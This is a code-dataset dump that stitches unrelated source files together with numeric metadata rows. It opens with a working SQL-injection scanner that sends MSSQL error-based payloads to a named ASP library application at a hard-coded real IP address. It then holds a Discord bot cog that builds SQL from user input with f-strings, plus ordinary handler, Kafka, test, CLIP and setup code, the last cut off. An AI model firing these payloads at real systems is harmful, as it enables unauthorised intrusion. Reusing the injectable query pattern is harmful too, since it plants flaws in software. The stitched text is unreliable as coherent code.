arg + 'gl_xiu.asp?id=1',
arg + 'mafen.asp?shuxing=1',
arg + 'ping_cha.asp?mingcheng=1',
arg + 'ping_hao.asp?mingcheng=1',
arg + 'pl_add.asp?id=1',
arg + 'search.asp?keywords=1&shuxing=1',
]
for url in urls:
url += '%20and%201=convert(int,CHAR(87)%2BCHAR(116)%2BCHAR(70)%2BCHAR(97)%2BCHAR(66)%2BCHAR(99)%2B@@version)'
code, head, res, err, _ = curl.curl2(url)
if((code == 200) or (code == 500)) and ('WtFaBcMicrosoft SQL Server' in res):
security_hole("SQL Injection: " + url)
url = arg + 'gl_tz_she.asp?zt=11%20WHERE%201=1%20AND%201=convert(int,CHAR(87)%2BCHAR(116)%2BCHAR(70)%2BCHAR(97)%2BCHAR(66)%2BCHAR(99)%2B@@version)--'
code, head, res, err, _ = curl.curl2(url)
if ((code == 200) or (code == 500)) and ('WtFaBcMicrosoft SQL Server' in res):
security_hole("SQL Injection: " + url)
if __name__ == '__main__':
from dummy import *
audit(assign('tianrui_lib','http://218.92.71.5:1085/trebook/')[1])
| 41.628571
| 154
| 0.587509
| 218
| 1,457
| 3.798165
| 0.454128
| 0.038647
| 0.036232
| 0.043478
| 0.490338
| 0.463768
| 0.427536
| 0.427536
| 0.427536
| 0.427536
| 0
| 0.099291
| 0.225806
| 1,457
| 35
| 155
| 41.628571
| 0.634752
| 0.091283
| 0
| 0.214286
| 0
| 0.071429
| 0.451788
| 0.262053
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.035714
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c933cadd6174b03b61565756a1609302c0c6bfc6
| 6,176
|
py
|
Python
|
moona/lifespan/handlers.py
|
katunilya/mona
|
8f44a9e06910466afbc9b2bcfb42144dcd25ed5a
|
[
"MIT"
] | 2
|
2022-03-26T15:27:31.000Z
|
2022-03-28T22:00:32.000Z
|
moona/lifespan/handlers.py
|
katunilya/mona
|
8f44a9e06910466afbc9b2bcfb42144dcd25ed5a
|
[
"MIT"
] | null | null | null |
moona/lifespan/handlers.py
|
katunilya/mona
|
8f44a9e06910466afbc9b2bcfb42144dcd25ed5a
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from copy import deepcopy
from dataclasses import dataclass
from typing import Callable, TypeVar
from pymon import Future, Pipe, cmap, creducel, hof_2, this_async
from pymon.core import returns_future
from moona.lifespan import LifespanContext
LifespanFunc = Callable[[LifespanContext], Future[LifespanContext | None]]
_LifespanHandler = Callable[
[LifespanFunc, LifespanContext], Future[LifespanContext | None]
]
def compose(h1: _LifespanHandler, h2: _LifespanHandler) -> LifespanHandler:
"""Compose 2 `LifespanHandler`s into one.
Args:
h1 (_LifespanHandler): to run first.
h2 (_LifespanHandler): to run second.
Returns:
LifespanHandler: resulting handler.
"""
def handler(
final: LifespanFunc, ctx: LifespanContext
) -> Future[LifespanContext | None]:
_h1 = hof_2(h1)
_h2 = hof_2(h2)
func = _h1(_h2(final))
return func(ctx)
return LifespanHandler(handler)
@dataclass(frozen=True, slots=True)
class LifespanHandler:
"""Abstraction over function that hander `LifespanContext`."""
_handler: Callable[[LifespanContext], Future[LifespanContext | None]]
def __call__( # noqa
self, nxt: LifespanFunc, ctx: LifespanContext
) -> Future[LifespanContext | None]:
return returns_future(self._handler)(nxt, ctx)
def __init__(self, handler: _LifespanHandler) -> None:
object.__setattr__(self, "_handler", handler)
def compose(self, h: _LifespanHandler) -> LifespanHandler:
"""Compose 2 `LifespanHandler`s into one.
Args:
h2 (_LifespanHandler): to run next.
Returns:
LifespanHandler: resulting handler.
"""
return compose(self, h)
def __rshift__(self, h: _LifespanHandler) -> LifespanHandler:
return compose(self, h)
A = TypeVar("A")
B = TypeVar("B")
C = TypeVar("C")
def handler(func: _LifespanHandler) -> LifespanHandler:
"""Decorator that converts function to LifespanHandler callable."""
return LifespanHandler(func)
def handle_func(func: LifespanFunc) -> LifespanHandler:
"""Converts `LifespanFunc` to `LifespanHandler`.
Args:
func (LifespanFunc): to convert to `LifespanHandler`.
Returns:
LifespanHandler: result.
"""
@handler
async def _handler(
nxt: LifespanFunc, ctx: LifespanContext
) -> LifespanContext | None:
match await func(ctx):
case None:
return None
case LifespanContext() as _ctx:
return await nxt(_ctx)
return _handler
def handle_func_sync(
func: Callable[[LifespanContext], LifespanContext | None]
) -> LifespanHandler:
"""Converts sync `LifespanFunc` to `LifespanHandler`.
Args:
func (Callable[[LifespanContext], LifespanContext | None]): to convert to
`LifespanHandler`.
Returns:
LifespanHandler: result.
"""
@handler
async def _handler(
nxt: LifespanFunc, ctx: LifespanContext
) -> LifespanContext | None:
match func(ctx):
case None:
return None
case LifespanContext() as _ctx:
return await nxt(_ctx)
return _handler
def __choose_reducer(f: LifespanFunc, s: LifespanFunc) -> LifespanFunc:
@returns_future
async def func(ctx: LifespanContext) -> LifespanFunc:
_ctx = deepcopy(ctx)
match await f(_ctx):
case None:
return await s(ctx)
case some:
return some
return func
def choose(handlers: list[LifespanHandler]) -> LifespanHandler:
"""Iterate though handlers till one would return some `LifespanContext`.
Args:
handlers (list[LifespanHandler]): to iterate through.
Returns:
LifespanHandler: result.
"""
@handler
async def _handler(
nxt: LifespanFunc, ctx: LifespanContext
) -> LifespanContext | None:
match handlers:
case []:
return await nxt(ctx)
case _:
func: LifespanFunc = (
Pipe(handlers)
.then(cmap(hof_2))
.then(cmap(lambda h: h(nxt)))
.then(creducel(__choose_reducer))
.finish()
)
return await func(ctx)
return _handler
def handler1(
func: Callable[[A, LifespanFunc, LifespanContext], Future[LifespanContext | None]]
) -> Callable[[A], LifespanHandler]:
"""Decorator for LifespanHandlers with 1 additional argument.
Makes it "curried".
"""
def wrapper(a: A) -> LifespanHandler:
return LifespanHandler(lambda nxt, ctx: func(a, nxt, ctx))
return wrapper
def handler2(
func: Callable[
[A, B, LifespanFunc, LifespanContext], Future[LifespanContext | None]
]
) -> Callable[[A, B], LifespanHandler]:
"""Decorator for LifespanHandlers with 2 additional arguments.
Makes it "curried".
"""
def wrapper(a: A, b: B) -> LifespanHandler:
return LifespanHandler(lambda nxt, ctx: func(a, b, nxt, ctx))
return wrapper
def handler3(
func: Callable[
[A, B, C, LifespanFunc, LifespanContext], Future[LifespanContext | None]
]
) -> Callable[[A, B, C], LifespanHandler]:
"""Decorator for LifespanHandlers with 1 additional argument.
Makes it "curried".
"""
def wrapper(a: A, b: B, c: C) -> LifespanHandler:
return LifespanHandler(lambda nxt, ctx: func(a, b, c, nxt, ctx))
return wrapper
def skip(_: LifespanContext) -> Future[None]:
"""`LifespanFunc` that skips pipeline by returning `None` instead of context.
Args:
_ (LifespanContext): ctx we don't care of.
Returns:
Future[None]: result.
"""
return Future(this_async(None))
def end(ctx: LifespanContext) -> Future[LifespanContext]:
"""`LifespanFunc` that finishes the pipeline of request handling.
Args:
ctx (LifespanContext): to end.
Returns:
Future[LifespanContext]: ended ctx.
"""
return Future(this_async(ctx))
| 25.841004
| 86
| 0.629858
| 614
| 6,176
| 6.21987
| 0.200326
| 0.064677
| 0.084839
| 0.083792
| 0.462425
| 0.350092
| 0.321288
| 0.305316
| 0.258968
| 0.188793
| 0
| 0.005095
| 0.269106
| 6,176
| 238
| 87
| 25.94958
| 0.840939
| 0.246438
| 0
| 0.284483
| 0
| 0
| 0.002505
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163793
| false
| 0
| 0.060345
| 0.043103
| 0.465517
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9340f2d3c1db26d4655357d65aa1d342c92a30f
| 4,246
|
py
|
Python
|
bot/cogs/birthday/birthday.py
|
Qtopia-Team/luci
|
9b7f1966050910d50f04cbd9733d1c77ffbb8cba
|
[
"MIT"
] | 5
|
2021-04-27T10:50:54.000Z
|
2021-08-02T09:11:56.000Z
|
bot/cogs/birthday/birthday.py
|
Qtopia-Team/luci
|
9b7f1966050910d50f04cbd9733d1c77ffbb8cba
|
[
"MIT"
] | 2
|
2021-06-17T14:53:13.000Z
|
2021-06-19T02:14:36.000Z
|
bot/cogs/birthday/birthday.py
|
luciferchase/luci
|
91e30520cfc60177b9916d3f3d41678f590ecdfc
|
[
"MIT"
] | 4
|
2021-06-11T12:02:42.000Z
|
2021-06-30T16:56:46.000Z
|
import discord
from discord.ext import commands
import json
import os
import psycopg2
import pytz
class Birthday(commands.Cog):
"""Never forget birthday of your friends"""
def __init__(self):
# Set up database
DATABASE_URL = os.environ["DATABASE_URL"]
self.dbcon = psycopg2.connect(DATABASE_URL, sslmode = "require")
self.cursor = self.dbcon.cursor()
# Make a table if not already made
query = """CREATE TABLE IF NOT EXISTS bday(
id BIGINT NOT NULL PRIMARY KEY,
guild_id BIGINT NOT NULL,
bday_date INT NOT NULL,
bday_month INT NOT NULL,
tz TEXT NOT NULL
)"""
self.cursor.execute(query)
self.dbcon.commit()
@commands.guild_only()
@commands.group(invoke_without_command = True)
async def bday(self, ctx):
"""To set your bday type `luci bday set`
If you want to edit a bday type `luci bday edit`"""
pass
@bday.command(name = "set")
async def setbday(self, ctx, member: discord.Member, date, tz = "UTC"):
"""Usage: luci bday set @Lucifer Chase 27/02 kolkata
If you don't care about the timezone thing leave it blank"""
date = date.split("/")
for i in range(2):
if (date[i][0] == 0):
date[i] = date[i][1]
correct_date = True
if (date[0] > 31 or date[0] < 0 or date[1] > 12 or date[0] < 0):
correct_date = False
if (date[0] > 30 and date[1] not in [1, 3, 5, 7, 8, 10, 12]):
correct_date = False
elif (date[1] == 2 and date[0] > 27):
correct_date = False
if (not correct_date):
await ctx.send("Bruh! My expectation from you was low but holy shit!")
bday_date, bday_month = date
if (tz != "UTC"):
list_of_timezones = list(pytz.all_timezones)
for i in range(len(list_of_timezones)):
if (tz.title() in list_of_timezones[i]):
tz = list_of_timezones[i]
break
else:
await ctx.send("Uh oh! Timezone not found 👀")
await ctx.send("You can check list of timezones using `luci timezones [continent name]`")
return
try:
self.cursor.execute("DELETE FROM bday WHERE id = {}".format(member.id))
self.dbcon.commit()
except:
pass
query = f"""INSERT INTO bday VALUES
({member.id}, {member.guild.id}, {bday_date}, {bday_month}, '{tz}')"""
try:
self.cursor.execute(query)
self.dbcon.commit()
except Exception as error:
await ctx.send(f"```css\n{error}```")
await ctx.send(str("Are you doing everything correctly?" +
"Might want to check usage `luci help bday set`" +
"Or if the problem persists ping `@Lucifer Chase`"))
else:
embed = discord.Embed(title = "Success! <a:nacho:839499460874862655>", color = 0x00FFFF)
embed.add_field(name = "Member", value = member.nick)
embed.add_field(name = "Date", value = "/".join(date))
embed.add_field(name = "Timezone", value = tz)
await ctx.send(embed = embed)
@bday.command(name = "delete")
async def bdaydelete(self, ctx):
self.cursor.execute("DELETE FROM bday WHERE id = {}".format(ctx.author.id))
self.dbcon.commit()
@commands.command()
@commands.is_owner()
async def showbday(self, ctx):
self.cursor.execute("SELECT * FROM bday")
data = self.cursor.fetchall()
await ctx.send("```css\n{}```".format(json.dumps(data[len(data)//2:], indent = 1)))
await ctx.send("```css\n{}```".format(json.dumps(data[:len(data)//2], indent = 1)))
not_redundant = []
redundant = []
for i in data:
if (i[0] not in not_redundant):
not_redundant.append(i[0])
else:
redundant.append(i[0])
await ctx.send("```css\n{}```".format(json.dumps(redundant, indent = 2)))
| 35.090909
| 105
| 0.544277
| 539
| 4,246
| 4.218924
| 0.339518
| 0.031662
| 0.047493
| 0.022427
| 0.14248
| 0.128848
| 0.128848
| 0.096306
| 0.082674
| 0.043975
| 0
| 0.023558
| 0.330193
| 4,246
| 121
| 106
| 35.090909
| 0.775668
| 0.02049
| 0
| 0.177778
| 0
| 0.011111
| 0.230417
| 0.007121
| 0
| 0
| 0.002035
| 0
| 0
| 1
| 0.011111
| false
| 0.022222
| 0.066667
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9359b5500958801527c3395149655f6f66f2d7a
| 1,620
|
py
|
Python
|
ingestion/producer1.py
|
aspk/ratsadtarget
|
e93cd3f71000ec409e79e6e0c873578f0e8fa8b3
|
[
"Apache-2.0"
] | 1
|
2020-03-03T18:46:15.000Z
|
2020-03-03T18:46:15.000Z
|
ingestion/producer1.py
|
Keyology/ratsadtarget
|
e93cd3f71000ec409e79e6e0c873578f0e8fa8b3
|
[
"Apache-2.0"
] | null | null | null |
ingestion/producer1.py
|
Keyology/ratsadtarget
|
e93cd3f71000ec409e79e6e0c873578f0e8fa8b3
|
[
"Apache-2.0"
] | 1
|
2020-03-03T18:46:18.000Z
|
2020-03-03T18:46:18.000Z
|
# producer to stream data into kafka
from boto.s3.connection import S3Connection
import datetime
import json
import bz2
from kafka import KafkaProducer
from kafka.errors import KafkaError
import time
import pytz
conn = S3Connection()
key = conn.get_bucket('aspk-reddit-posts').get_key('comments/RC_2017-11.bz2')
producer = KafkaProducer(bootstrap_servers=['10.0.0.5:9092'])
count = 0
decomp = bz2.BZ2Decompressor()
CHUNK_SIZE= 5000*1024
timezone = pytz.timezone("America/Los_Angeles")
start_time = time.time()
while True:
print('in')
chunk = key.read(CHUNK_SIZE)
if not chunk:
break
data = decomp.decompress(chunk).decode()
for i in data.split('\n'):
try:
count+=1
if count%10000==0 and count!=0:
print('rate of kafka producer messages is {}'.format(count/(time.time()-start_time)))
comment = json.loads(i)
reddit_event = {}
reddit_event['post'] = comment['permalink'].split('/')[-3]
reddit_event['subreddit'] = comment['subreddit']
reddit_event['timestamp'] = str(datetime.datetime.fromtimestamp(time.time()))
reddit_event['body'] = comment['body']
reddit_event['author'] = comment['author']
producer.send('reddit-stream-topic', bytes(json.dumps(reddit_event),'utf-8'))
producer.flush()
# to reduce speed use time.sleep(0.01)
#time.sleep(0.001)
except:
print('Incomplete string ... skipping this comment')
#break
| 33.061224
| 105
| 0.608642
| 193
| 1,620
| 5.025907
| 0.528497
| 0.079381
| 0.020619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040235
| 0.26358
| 1,620
| 48
| 106
| 33.75
| 0.772842
| 0.057407
| 0
| 0
| 0
| 0
| 0.158344
| 0.015112
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.210526
| 0
| 0.210526
| 0.078947
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9380c3f618a01051fb6b644e3bcd12fce9edfdc
| 7,931
|
py
|
Python
|
tests/test_data/test_data_core.py
|
shaoeric/hyperparameter_hunter
|
3709d5e97dd23efa0df1b79982ae029789e1af57
|
[
"MIT"
] | 688
|
2018-06-01T23:43:28.000Z
|
2022-03-23T06:37:20.000Z
|
tests/test_data/test_data_core.py
|
shaoeric/hyperparameter_hunter
|
3709d5e97dd23efa0df1b79982ae029789e1af57
|
[
"MIT"
] | 188
|
2018-07-09T23:22:31.000Z
|
2021-04-01T07:43:46.000Z
|
tests/test_data/test_data_core.py
|
shaoeric/hyperparameter_hunter
|
3709d5e97dd23efa0df1b79982ae029789e1af57
|
[
"MIT"
] | 100
|
2018-08-28T03:30:47.000Z
|
2022-01-25T04:37:11.000Z
|
##################################################
# Import Own Assets
##################################################
from hyperparameter_hunter.data.data_core import BaseDataChunk, BaseDataset, NullDataChunk
##################################################
# Import Miscellaneous Assets
##################################################
import pandas as pd
import pytest
from unittest import mock
##################################################
# White-Box/Structural Test Fixtures
##################################################
@pytest.fixture(scope="module")
def null_chunk_fixture():
"""Boring fixture that creates an instance of :class:`data.data_core.NullDataChunk`"""
return NullDataChunk()
@pytest.fixture(scope="module")
def base_dataset_fixture():
"""Boring fixture that creates an instance of :class:`data.data_core.BaseDataset`"""
return BaseDataset(None, None)
##################################################
# White-Box/Structural Tests
##################################################
@mock.patch("hyperparameter_hunter.data.data_core.NullDataChunk._on_call_default")
@pytest.mark.parametrize("point", ["start", "end"])
@pytest.mark.parametrize("division", ["exp", "rep", "fold", "run"])
def test_callback_method_invocation(mock_on_call_default, point, division, null_chunk_fixture):
"""Test that calling any primary callback methods of :class:`data.data_core.NullDataChunk`
results in a call to :meth:`data.data_core.BaseDataCore._on_call_default` with the appropriate
`division` and `point` arguments. Using `on_fold_end` as an example, this function ensures::
`on_fold_end(...)` call -> `_on_call_default("fold", "end", ...)` call"""
null_chunk_fixture.__getattribute__(f"on_{division}_{point}")("An arg", k="A kwarg")
mock_on_call_default.assert_called_once_with(division, point, "An arg", k="A kwarg")
@pytest.mark.parametrize("point", ["start", "end"])
@pytest.mark.parametrize("division", ["exp", "rep", "fold", "run"])
def test_do_something_invocation(point, division, null_chunk_fixture):
"""Test that calling :meth:`data.data_core.NullDataChunk._do_something` results in the invocation
of the proper primary callback method as specified by `division` and `point`. Using
`on_fold_end` as an example, this function ensures::
`_do_something("fold", "end", ...)` call -> `on_fold_end(...)` call"""
method_to_mock = f"on_{division}_{point}"
mock_method_path = f"hyperparameter_hunter.data.data_core.NullDataChunk.{method_to_mock}"
with mock.patch(mock_method_path) as mock_primary_callback:
null_chunk_fixture._do_something(division, point, "An arg", k="A kwarg")
mock_primary_callback.assert_called_once_with("An arg", k="A kwarg")
@pytest.mark.parametrize("point", ["start", "end"])
@pytest.mark.parametrize("division", ["exp", "rep", "fold", "run"])
def test_kind_chunk_invocation(point, division, base_dataset_fixture):
"""Test that calling :meth:`data.data_core.BaseDataset._do_something` results in the invocation
of the proper callback method of :class:`data.data_core.BaseDataChunk` three times (once for
`input`, `target` and `prediction`). Using `on_fold_end` as an example, this function ensures::
`_do_something("fold", "end", ...)` `BaseDataset` call ->
`on_fold_end(...)` call (`input` chunk)
`on_fold_end(...)` call (`target` chunk)
`on_fold_end(...)` call (`prediction` chunk)"""
method_to_mock = f"on_{division}_{point}"
mock_method_path = f"hyperparameter_hunter.data.data_core.BaseDataChunk.{method_to_mock}"
with mock.patch(mock_method_path) as mock_primary_callback:
base_dataset_fixture._do_something(division, point, "An arg", k="A kwarg")
mock_primary_callback.assert_has_calls([mock.call("An arg", k="A kwarg")] * 3)
##################################################
# `BaseDataChunk` Equality
##################################################
def _update_data_chunk(updates: dict):
chunk = BaseDataChunk(None)
for key, value in updates.items():
if key.startswith("T."):
setattr(chunk.T, key[2:], value)
else:
setattr(chunk, key, value)
return chunk
@pytest.fixture()
def data_chunk_fixture(request):
return _update_data_chunk(getattr(request, "param", dict()))
@pytest.fixture()
def another_data_chunk_fixture(request):
return _update_data_chunk(getattr(request, "param", dict()))
#################### Test Scenario Data ####################
df_0 = pd.DataFrame(dict(a=[1, 2, 3], b=[4, 5, 6]))
df_1 = pd.DataFrame(dict(a=[1, 2, 3], b=[999, 5, 6]))
df_2 = pd.DataFrame(dict(a=[1, 2, 3], b=[4, 5, 6]), index=["foo", "bar", "baz"])
df_3 = pd.DataFrame(dict(a=[1, 2, 3], c=[4, 5, 6]), index=["foo", "bar", "baz"])
df_4 = pd.DataFrame(dict(a=[1, 2, 3], b=[4, 5, 6], c=[7, 8, 9]))
chunk_data_0 = dict(d=pd.DataFrame())
chunk_data_1 = dict(d=pd.DataFrame(), fold=df_0)
chunk_data_2 = dict(d=pd.DataFrame(), fold=df_1)
chunk_data_3 = dict(d=pd.DataFrame(), fold=df_2)
chunk_data_4 = {"d": pd.DataFrame(), "fold": df_2, "T.fold": df_3}
chunk_data_5 = {"d": pd.DataFrame(), "fold": df_3, "T.fold": df_2}
chunk_data_6 = {"d": pd.DataFrame(), "fold": df_3, "T.fold": df_2, "T.d": df_4}
@pytest.mark.parametrize(
["data_chunk_fixture", "another_data_chunk_fixture"],
[
[dict(), dict()],
[chunk_data_0, chunk_data_0],
[chunk_data_1, chunk_data_1],
[chunk_data_2, chunk_data_2],
[chunk_data_3, chunk_data_3],
[chunk_data_4, chunk_data_4],
[chunk_data_5, chunk_data_5],
[chunk_data_6, chunk_data_6],
],
indirect=True,
)
def test_data_chunk_equality(data_chunk_fixture, another_data_chunk_fixture):
assert data_chunk_fixture == another_data_chunk_fixture
#################### Inequality Tests ####################
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_1, chunk_data_2, chunk_data_3, chunk_data_4, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_0(data_chunk_fixture):
assert _update_data_chunk(chunk_data_0) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_2, chunk_data_3, chunk_data_4, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_1(data_chunk_fixture):
assert _update_data_chunk(chunk_data_1) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_3, chunk_data_4, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_2(data_chunk_fixture):
assert _update_data_chunk(chunk_data_2) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_2, chunk_data_4, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_3(data_chunk_fixture):
assert _update_data_chunk(chunk_data_3) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_2, chunk_data_3, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_4(data_chunk_fixture):
assert _update_data_chunk(chunk_data_4) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_2, chunk_data_3, chunk_data_4, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_5(data_chunk_fixture):
assert _update_data_chunk(chunk_data_5) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_2, chunk_data_3, chunk_data_4, chunk_data_5],
indirect=True,
)
def test_data_chunk_inequality_6(data_chunk_fixture):
assert _update_data_chunk(chunk_data_6) != data_chunk_fixture
| 40.258883
| 102
| 0.667381
| 1,089
| 7,931
| 4.490358
| 0.129477
| 0.128834
| 0.094888
| 0.0409
| 0.742945
| 0.698978
| 0.653783
| 0.615542
| 0.539468
| 0.447853
| 0
| 0.018766
| 0.133274
| 7,931
| 196
| 103
| 40.464286
| 0.69261
| 0.189888
| 0
| 0.317073
| 0
| 0
| 0.120014
| 0.050295
| 0
| 0
| 0
| 0
| 0.089431
| 1
| 0.130081
| false
| 0
| 0.03252
| 0.01626
| 0.203252
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c93c9aaedb099246f931a93b0f3660c7f68b5819
| 2,481
|
py
|
Python
|
src/models/zeroshot.py
|
mmatena/wise-ft
|
2630c366d252ad32db82ea886f7ab6a752142792
|
[
"MIT"
] | 79
|
2021-10-01T22:29:51.000Z
|
2022-03-30T04:19:58.000Z
|
src/models/zeroshot.py
|
mmatena/wise-ft
|
2630c366d252ad32db82ea886f7ab6a752142792
|
[
"MIT"
] | 2
|
2021-11-18T19:50:59.000Z
|
2022-01-08T00:57:24.000Z
|
src/models/zeroshot.py
|
mmatena/wise-ft
|
2630c366d252ad32db82ea886f7ab6a752142792
|
[
"MIT"
] | 10
|
2021-10-14T18:29:59.000Z
|
2022-03-27T12:40:18.000Z
|
import os
import torch
from tqdm import tqdm
import numpy as np
import clip.clip as clip
import src.templates as templates
import src.datasets as datasets
from src.args import parse_arguments
from src.models.modeling import ClassificationHead, ImageEncoder, ImageClassifier
from src.models.eval import evaluate
def get_zeroshot_classifier(args, clip_model):
assert args.template is not None
assert args.train_dataset is not None
template = getattr(templates, args.template)
logit_scale = clip_model.logit_scale
dataset_class = getattr(datasets, args.train_dataset)
dataset = dataset_class(
None,
location=args.data_location,
batch_size=args.batch_size,
classnames=args.classnames
)
device = args.device
clip_model.eval()
clip_model.to(device)
print('Getting zeroshot weights.')
with torch.no_grad():
zeroshot_weights = []
for classname in tqdm(dataset.classnames):
texts = []
for t in template:
texts.append(t(classname))
texts = clip.tokenize(texts).to(device) # tokenize
embeddings = clip_model.encode_text(texts) # embed with text encoder
embeddings /= embeddings.norm(dim=-1, keepdim=True)
embeddings = embeddings.mean(dim=0, keepdim=True)
embeddings /= embeddings.norm()
zeroshot_weights.append(embeddings)
zeroshot_weights = torch.stack(zeroshot_weights, dim=0).to(device)
zeroshot_weights = torch.transpose(zeroshot_weights, 0, 2)
zeroshot_weights *= logit_scale.exp()
zeroshot_weights = zeroshot_weights.squeeze().float()
zeroshot_weights = torch.transpose(zeroshot_weights, 0, 1)
classification_head = ClassificationHead(normalize=True, weights=zeroshot_weights)
return classification_head
def eval(args):
args.freeze_encoder = True
if args.load is not None:
classifier = ImageClassifier.load(args.load)
else:
image_encoder = ImageEncoder(args, keep_lang=True)
classification_head = get_zeroshot_classifier(args, image_encoder.model)
delattr(image_encoder.model, 'transformer')
classifier = ImageClassifier(image_encoder, classification_head, process_images=False)
evaluate(classifier, args)
if args.save is not None:
classifier.save(args.save)
if __name__ == '__main__':
args = parse_arguments()
eval(args)
| 30.62963
| 94
| 0.694478
| 292
| 2,481
| 5.715753
| 0.325342
| 0.116836
| 0.02157
| 0.029958
| 0.053925
| 0.053925
| 0.053925
| 0
| 0
| 0
| 0
| 0.003634
| 0.2237
| 2,481
| 81
| 95
| 30.62963
| 0.862928
| 0.012898
| 0
| 0
| 0
| 0
| 0.017981
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 1
| 0.033333
| false
| 0
| 0.166667
| 0
| 0.216667
| 0.016667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c93cab934e2e3f25cd7169e11400beb6e6d43570
| 425
|
py
|
Python
|
app/main/__init__.py
|
csmcallister/beular
|
219bcd552c1303eb0557f3ef56d44355a932399e
|
[
"CNRI-Python"
] | null | null | null |
app/main/__init__.py
|
csmcallister/beular
|
219bcd552c1303eb0557f3ef56d44355a932399e
|
[
"CNRI-Python"
] | null | null | null |
app/main/__init__.py
|
csmcallister/beular
|
219bcd552c1303eb0557f3ef56d44355a932399e
|
[
"CNRI-Python"
] | null | null | null |
from flask import Blueprint
bp = Blueprint('main', __name__)
@bp.after_app_request
def after_request(response):
"""Cache Bust
"""
cache_cont = "no-cache, no-store, must-revalidate, public, max-age=0"
response.headers["Cache-Control"] = cache_cont
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
from app.main import routes # noqa: F401
| 25
| 74
| 0.665882
| 54
| 425
| 5.074074
| 0.574074
| 0.164234
| 0.116788
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014837
| 0.207059
| 425
| 17
| 75
| 25
| 0.79822
| 0.063529
| 0
| 0
| 0
| 0
| 0.244032
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.4
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9418c993a05d0182f414df4de245fd5f5288aa8
| 1,470
|
py
|
Python
|
setup.py
|
jmacgrillen/perspective
|
6e6e833d8921c54c907dd6314d4bc02ba3a3c0b6
|
[
"MIT"
] | null | null | null |
setup.py
|
jmacgrillen/perspective
|
6e6e833d8921c54c907dd6314d4bc02ba3a3c0b6
|
[
"MIT"
] | null | null | null |
setup.py
|
jmacgrillen/perspective
|
6e6e833d8921c54c907dd6314d4bc02ba3a3c0b6
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python -*- coding: utf-8 -*-
"""
Name:
setup.py
Desscription:
Install the maclib package.
Version:
1 - Inital release
Author:
J.MacGrillen <macgrillen@gmail.com>
Copyright:
Copyright (c) John MacGrillen. All rights reserved.
"""
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
install_requirements = [
"maclib",
"opencv-python",
"numpy",
"Pillow",
"charset-normalizer"
]
def setup_perspective_package() -> None:
"""
Install and configure Perspective for use
"""
setup(
name='Perspective',
version="0.0.1",
